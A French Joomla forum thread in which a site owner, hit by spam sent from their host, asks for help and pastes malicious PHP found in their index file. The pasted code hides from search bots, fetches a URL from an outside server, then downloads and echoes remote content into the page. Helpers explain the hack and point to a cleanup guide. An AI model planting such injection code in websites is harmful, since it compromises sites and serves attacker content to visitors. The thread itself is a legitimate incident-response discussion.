Envoi de spam via formulaire de contact Joomla 3x

Réduire
X
Réduire
 
  • Page sur 1
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages
Précédent template Suivant
  • #1

    [RÉGLÉ] Envoi de spam via formulaire de contact Joomla 3x

    Bonjour à tous,

    J'ai un souci sur le site www.borddesmondes.com.

    Mon hébergeur me fait savoir que le formulaire de contact est utilisé pour envoyer du spam. Dans l'urgence, j'ai dépublié le formulaire, pensant régler le problème. Mais celui ci persiste.

    voici le message de l'hébergeur (Nuxit)

    Nous vous contactons pour vous informer que votre quota d'envoi d'email avec la fonction mail() de PHP est atteint pour votre hébergement borddesmondes.com.

    Seuls les 1000 premiers mails ont été délivrés. Merci de prendre connaissance du lien suivant à ce sujet :

    http://aide.nuxit.com/doku.php/hebergement_mutualise/emails/charte_d_utilisation_smtp


    Si vous n'avez pas effectué ces envois alors il peut que ce soit fait à votre insu via, un formulaire non sécurisé ou depuis une faille de sécurité de votre site. Nous vous invitons dans ce cas à vérifier le ou les sites sur votre hébergement.

    Est il possible que la fonction mail soit utilisée alors que le formulaire n'est plus publié?
    Que puis je faire pour résoudre ce problème?

    En cherchant à me renseigner je suis tombé sur forum post assistant, vous pouvez donc consulter le résultat à l'adresse http://www.borddesmondes.com/fpa-en.php

    Merci d'avance pour votre aide.
    Dernière édition par ashken à 21/01/2015, 16h44 Raison: Problème résolu
    Tags: Aucun
  • #2
    Re : Envoi de spam via formulaire de contact Joomla 3x

    Tu n'aurais pas envoyé une newsletter, par hasard ?
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire

    • #3
      Re : Envoi de spam via formulaire de contact Joomla 3x

      Envoyé par RobertG Voir le message
      Tu n'aurais pas envoyé une newsletter, par hasard ?
      Si mais à une très petite liste (bien loin des 1000 mails autorisés par jour), de plus l'hebergeur à confirmé que ces mails ont été envoyés via le formulaire de contact :

      Bonjour,

      Nous avons détecté aujourd'hui le 20/01/2015 un envoi massif de spam via le formulaire de contact de votre site.

      Si vous n'avez pas effectué ces envois, alors il se peut que ce soit fait à votre insu via un formulaire non sécurisé ou depuis une faille de sécurité de votre site. Nous vous invitons dans ce cas à vérifier le ou les sites sur votre hébergement.

      Restant à votre disposition pour d'autres informations.

      Cordialement.

      J'oubliais de préciser, tout semble avoir commencé lorsque j'ai trouvé les lignes suivantes dans mon index :

      Code:
      $content=$_SERVER['HTTP_USER_AGENT'];
if(!preg_match('#Yandex|Googlebot|StackRambler|Yahoo|Slurp|msnbot|msnbot#', $content, $results)) 
{
  $linknotepad=file_get_contents('http://cdsolinc.com/tmp/1.txt'); // берем ссылку на прокладку
  if(preg_match('#http|https#', $linknotepad, $results)) 
  {
    $link_download_soft=file_get_contents(trim($linknotepad));
    echo $link_download_soft;
  }
//echo "good";
echo "<!--SuperMainCoreScript-->";
} 
else 
{ 
  //echo "bot";
      Merci pour ta réponse
      Dernière édition par ashken à 21/01/2015, 16h05

      Commentaire

      • #4
        Re : Envoi de spam via formulaire de contact Joomla 3x

        Bonjour,

        Tout laisse à penser qu ele site a été "quelque peu" piraté, et que hormis l'index, qui n'a servi que de vérin pourt installer du script malveillant, des composants ou autres sont atteints.

        Seule solution, faire un vrai nettoyage du site, du sol au plafond, pour éviter ce genre de déboire.
        Pas de demande de support par MP.
        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

        Commentaire

        • #5
          Re : Envoi de spam via formulaire de contact Joomla 3x

          Donc ce serait un piratage et pas une simple utilisation du formulaire de contact, qui d'ailleurs aurait dû t'envoyer un mail à toi, destinataire principal, en plus d'une copie à l'expéditeur ou celui censé l'être.

          Ce code ne semble pas gérer un envoi de mails mais seulement un affichage d'un lien pirate sur ton site.
          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

          Commentaire

          • #6
            Re : Envoi de spam via formulaire de contact Joomla 3x

            Salut Jisse!

            Merci pour ta réponse. Qu'appelles tu faire un vrai nettoyage? Aurais tu des recommandations ou des liens utiles pour me renseigner?

            Commentaire

            • #7
              Re : Envoi de spam via formulaire de contact Joomla 3x

              Envoyé par RobertG Voir le message
              Ce code ne semble pas gérer un envoi de mails mais seulement un affichage d'un lien pirate sur ton site.
              Avec petit traçage et analyse, le code en question (son echo ne sera utilisé qu'une fois) récupère un fichier sur un serveur zombie. Ce zombie ne contient qu'une URL où le pirate va rechercher le vrai code à injecter. Le echo pouvant activer du PHP inline dans ce fichu fichier... Sans avoir pu mettre la main sur le fichier, difficile de savoir ce qu'il a fabriqué exactement dans le système.

              - - - Mise à jour - - -

              Envoyé par ashken Voir le message
              Merci pour ta réponse. Qu'appelles tu faire un vrai nettoyage? Aurais tu des recommandations ou des liens utiles pour me renseigner?
              Voir la démarche complète ici http://www.aesecure.com/fr/blog/site-hacke.html
              Pas de demande de support par MP.
              S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

              Commentaire

              • #8
                Re : Envoi de spam via formulaire de contact Joomla 3x

                Royal!

                Merci beaucoup à vous deux, je me penche immédiatement sur le lien que tu m'as fourni, Jisse.

                Je passe le sujet en résolu pour le moment et je vous tiendrais au courant.

                Merci encore

                Commentaire

                Précédent template Suivant

                Annonce

                Réduire
                Aucune annonce pour le moment.

                Partenaire de l'association

                Réduire
                Hébergeur Web PlanetHoster
                Travaille ...
                X